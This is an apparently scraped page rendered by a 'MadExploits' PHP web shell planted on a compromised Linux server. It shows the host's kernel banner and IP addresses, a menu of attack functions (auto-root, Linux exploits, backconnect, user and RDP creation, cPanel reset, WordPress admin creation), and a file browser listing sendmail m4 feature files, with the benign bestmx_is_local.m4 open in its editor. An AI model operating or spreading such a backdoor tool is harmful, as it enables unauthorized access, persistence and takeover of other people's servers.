Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.16.188.113
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
sendmail /
cf /
feature /
[ HOME SHELL ]
Name
Size
Permission
Action
accept_unqualified_senders.m4
413
B
-rw-r--r--
accept_unresolvable_domains.m4
416
B
-rw-r--r--
access_db.m4
2.2
KB
-rw-r--r--
allmasquerade.m4
755
B
-rw-r--r--
always_add_domain.m4
694
B
-rw-r--r--
authinfo.m4
868
B
-rw-r--r--
badmx.m4
586
B
-rw-r--r--
bcc.m4
2.63
KB
-rw-r--r--
bestmx_is_local.m4
1.65
KB
-rw-r--r--
bitdomain.m4
996
B
-rw-r--r--
blacklist_recipients.m4
510
B
-rw-r--r--
block_bad_helo.m4
552
B
-rw-r--r--
compat_check.m4
1.13
KB
-rw-r--r--
conncontrol.m4
1.14
KB
-rw-r--r--
delay_checks.m4
772
B
-rw-r--r--
dnsbl.m4
1.4
KB
-rw-r--r--
domainmap.m4
4.25
KB
-rw-r--r--
domaintable.m4
1009
B
-rw-r--r--
drac.m4
121
B
-rw-r--r--
enhdnsbl.m4
1.91
KB
-rw-r--r--
generics_entire_domain.m4
399
B
-rw-r--r--
genericstable.m4
1022
B
-rw-r--r--
greet_pause.m4
1.23
KB
-rw-r--r--
ldap_routing.m4
1.92
KB
-rw-r--r--
limited_masquerade.m4
553
B
-rw-r--r--
local_lmtp.m4
795
B
-rw-r--r--
local_no_masquerade.m4
506
B
-rw-r--r--
local_procmail.m4
1.12
KB
-rw-r--r--
lookupdotdomain.m4
632
B
-rw-r--r--
loose_relay_check.m4
395
B
-rw-r--r--
mailertable.m4
1013
B
-rw-r--r--
masquerade_entire_domain.m4
565
B
-rw-r--r--
masquerade_envelope.m4
555
B
-rw-r--r--
msp.m4
2.91
KB
-rw-r--r--
mtamark.m4
1.14
KB
-rw-r--r--
no_default_msa.m4
382
B
-rw-r--r--
nocanonify.m4
743
B
-rw-r--r--
nopercenthack.m4
891
B
-rw-r--r--
notsticky.m4
612
B
-rw-r--r--
nouucp.m4
849
B
-rw-r--r--
nullclient.m4
1.16
KB
-rw-r--r--
prefixmod.m4
703
B
-rw-r--r--
preserve_local_plus_detail.m4
409
B
-rw-r--r--
preserve_luser_host.m4
550
B
-rw-r--r--
promiscuous_relay.m4
557
B
-rw-r--r--
queuegroup.m4
624
B
-rw-r--r--
ratecontrol.m4
1.14
KB
-rw-r--r--
redirect.m4
827
B
-rw-r--r--
relay_based_on_MX.m4
492
B
-rw-r--r--
relay_entire_domain.m4
400
B
-rw-r--r--
relay_hosts_only.m4
394
B
-rw-r--r--
relay_local_from.m4
591
B
-rw-r--r--
relay_mail_from.m4
698
B
-rw-r--r--
require_rdns.m4
383
B
-rw-r--r--
rhsbl.m4
1.48
KB
-rw-r--r--
smrsh.m4
771
B
-rw-r--r--
stickyhost.m4
546
B
-rw-r--r--
tls_session_features.m4
395
B
-rw-r--r--
use_client_ptr.m4
503
B
-rw-r--r--
use_ct_file.m4
707
B
-rw-r--r--
use_cw_file.m4
766
B
-rw-r--r--
uucpdomain.m4
990
B
-rw-r--r--
virtuser_entire_domain.m4
399
B
-rw-r--r--
virtusertable.m4
1019
B
-rw-r--r--
vnet.m4
2.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bestmx_is_local.m4
divert(-1) # # Copyright (c) 1998-2000 Proofpoint, Inc. and its suppliers. # All rights reserved. # Copyright (c) 1983 Eric P. Allman. All rights reserved. # Copyright (c) 1988, 1993 # The Regents of the University of California. All rights reserved. # # By using this file, you agree to the terms and conditions set # forth in the LICENSE file which can be found at the top level of # the sendmail distribution. # # divert(0) VERSIONID(`$Id: bestmx_is_local.m4,v 8.27 2013-11-22 20:51:11 ca Exp $') divert(-1) define(`_BESTMX_IS_LOCAL_', _ARG_) LOCAL_CONFIG # turn on bestMX lookup table Kbestmx bestmx ifelse(defn(`_ARG_'), `', `dnl',` # limit bestmx to these domains CB`'_ARG_') LOCAL_NET_CONFIG # If we are the best MX for a site, then we want to accept # its mail as local. We assume we've already weeded out mail to # UUCP sites which are connected to us, which should also have # listed us as their best MX. # # Warning: this may generate a lot of extra DNS traffic -- a # lower cost method is to list all the expected best MX hosts # in $=w. This should be fine (and easier to administer) for # low to medium traffic hosts. If you use the limited bestmx # by passing in a set of possible domains it will improve things. ifelse(defn(`_ARG_'), `', `dnl # unlimited bestmx R$* < @ $* > $* $: $1 < @ $2 @@ $(bestmx $2 $) > $3', `dnl # limit bestmx to $=B R$* < @ $* $=B . > $* $: $1 < @ $2 $3 . @@ $(bestmx $2 $3 . $) > $4') R$* $=O $* < @ $* @@ $=w . > $* $@ $>Recurse $1 $2 $3 R< @ $* @@ $=w . > : $* $@ $>Recurse $3 dnl we cannot use _LOCAL_ here since it is defined too late R$* < @ $* @@ $=w . > $* $@ $>CanonLocal < $1 > R$* < @ $* @@ $* > $* $: $1 < @ $2 > $4
Close